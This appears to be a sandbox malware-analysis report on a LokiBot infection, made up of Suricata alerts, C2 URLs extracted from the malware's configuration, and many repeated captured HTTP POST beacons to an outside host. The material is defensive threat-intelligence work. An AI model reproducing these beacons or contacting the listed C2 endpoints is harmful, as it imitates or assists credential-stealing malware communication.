Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49815
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49794 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49741 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49816 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49816 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49797 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49810 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49797 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49741 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49810 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49768 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49764 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49764 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49844
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49840 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49840 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49802 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49802 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49802 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49816 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49830 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49830 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49830 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49816 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49816 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49770
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49830 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49830 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49768 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49820 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49820 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49820 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49810
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49840 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49778 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49802 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49830

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://solutviewmen.viewdns.net/bdifygidj/five/fre.php

Source: Joe Sandbox View

ASN Name: CMCSUS CMCSUS

Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
